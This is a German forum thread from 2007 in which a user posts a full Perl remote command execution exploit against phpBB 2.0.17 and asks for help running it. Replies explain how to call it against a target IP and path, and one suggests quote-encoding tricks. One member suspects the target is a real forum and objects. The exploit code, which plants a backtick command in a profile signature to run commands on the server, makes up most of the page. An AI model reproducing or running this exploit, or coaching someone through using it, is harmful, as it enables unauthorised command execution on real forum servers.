Hilfe bei Exploit mit Perl

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von BasHx, 9. Juli 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 9. Juli 2007
    huhu zuerst einmal mein problem ich hab n exploit von ner seite

    Code:
    #!/usr/bin/perl
    
    # phpBB <= 2.0.17 remote command execution exploit
    # need for work: 
    # 1. PHP 5 < 5.0.5
    # 2. register_globals=On
    # 3. magic_quotes off
    # ------------------------------------------------
    # (c)oded by 1dt.w0lf
    # RST/GHC
    # http://rst.void.ru
    # http://ghc.ru
    # 03.11.05
    
    use LWP::UserAgent;
    use HTTP::Cookies;
    
    if(@ARGV < 2) { usage(); }
    
    head();
    
    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new();
    
    for($i=0;$i<5;$i++)
     {
     $rand .= int(rand(9)); 
     }
    
    $name = 'r57phpBB2017xpl'.$rand;
    $password = 'r57phpBB2017xpl'.$rand;
    $path = $ARGV[0];
    $cmd = $ARGV[1];
    $xpl->cookie_jar( $cookie_jar );
    
    $res = $xpl->post(
     $path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',
    
     Content => [ 
     'username' => $name,
     'email' => $rand.'_bill_gates@microsoft.com',
     'new_password' => $password,
     'password_confirm' => $password,
     'signature' => 'r57:`'.$cmd.'`',
     'viewemail' => '0',
     'hideonline' => '1',
     'notifyreply' => '0',
     'notifypm' => '0',
     'popup_pm' => '0',
     'attachsig' => '0',
     'allowbbcode' => '1',
     'allowhtml' => '1',
     'allowsmilies' => '0',
     'mode' => 'register',
     'agreed' => 'true',
     'coppa' => '0',
     'submit' => 'Submit',
     ],
     );
    
    if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); }
    else { print "Done. User $name successfully registered!\r\n"; }
    
    $res = $xpl->post(
     $path.'login.php',
     Content => [
     'username' => $name,
     'password' => $password,
     'redirect' => '',
     'login' => 'Log in',
     ],Referer => $path.'login.php');
    
    $res = $xpl->get($path.'profile.php?mode=editprofile');
    @content = split("\n",$res->content);
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    for(@content)
     {
     if(/<\/textarea>/) { $p = 0; }
     print $_."\r\n" if $p;
     if(/<textarea name="signature"/){ $p = 1; }
     }
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    
    sub head()
     {
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
     print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC\r\n"; 
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
     }
     
    sub usage()
     {
     head();
     print " Usage: r57phpBB2017.pl <path> <cmd>\r\n";
     print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n";
     print " <cmd> - Command for execute\r\n";
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
     print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n";
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
     exit();
     }
    
    # milw0rm.com [2005-12-24]
    wenn ich jetzt

    cd desktop
    und dann beispiel.pl eingebe komm ich in so n menü
    wenn ich path angebe bekomm ich zuerst nix dann geb ich nochmal ein und bekomme einen Syntaxfehler.

    woran liegt das ?!
     
  2. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    "so nen Syntaxfehler" ist nicht sehr aussagekräftig

    //edit habs mal getestet

    {bild-down: http://img258.imageshack.us/img258/3074/82988499gp6.jpg}
     
  3. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    haste auch ein perl Interpreter installiert ? z.b. activeperl
     
  4. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    ja hab activeperl..
    hm bei mir funkt das iwie nich
    ich mach z.B path xxx
    dann gibt der mir n Syntaxfehler an
    muss ich die ip eingeben oder die url ?
     
  5. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Schreib uns doch einfach mal wie die Ausgabe aussieht, oder mach am besten nen Screenshot

    Ach und bitte mach den Link raus ... sonst kommt das wie ein scheiß hack request rüber, und btw. hab ich kein Bock dir dabei zu helfen irgend ein Forum anzugreifen....
     
  6. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    bei mir sieht das iwie anders aus.. btw hab windoof -.-
    was muss ich den genau eingeben wenn ich path xxx eingebe kommt nix mehr .. dann kann ich nur nochwas eingeben..wenn ich dann cmd eintippe kommt iwie befehl nich gefunden oder so
     
  7. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Wenn du einfach so nett wärst und die KOMPLETTE Ausgabe posten würdest, kann doch nicht so schwer sein . Wenn du sagst es ist ein Syntax Fehler hat es was mit dem Script zu tun, und um das zu analysieren benötigt man eben den Fehler .

    Btw, sollte egal sein welches Betriebsystem
     
  8. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    ahso ok^^ mom kommt gleich #

    e/
    Download offline!
     
  9. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Also so wie ich das sehe liegt der Fehler nicht am Exploit selbst ( es hat nichmal eine Ausgabe für Syntax Error) sondern entweder an deinem Interpreter (ActivePerl) oder du hast das Exploit falsch / nicht vollständig kopiert

    Einfach nochmals probieren mit ner neuen Datei
     
  10. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Du hast den Befehl falsch eingegeben !

    richtig wäre:

    beispiel.pl "IP-Adresse mit /Pfad des entsprechenden spaces" "kommando"

    also z.B.

    beispiel.pl 91.54.43.46/phpbb/ ls
     
  11. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    danke brainstorm ich versuchs ma
    but . wie bekomm ich die ip vom forum heraus ?

    e/
    okay bis jetzt läuft alles gut.. hab user blabla registred aber der user funkt nicht ? btw password und username

    so siehts jetzt aus
    Download offline!
     
  12. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    dachte das sei per default on - naja musste halt mit ' aka %27 alias %2527 rumspielen
     
  13. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    hä wie meinste das jetzt ?
     
  14. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    Vergiss das Exploit. Die PHPBB-Version ist neuer als die fuer das Exploit...
     
  15. 9. Juli 2007
    AW: Hilfe bei Exploit mit Perl

    kk ich close hier ma..
     
  16. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.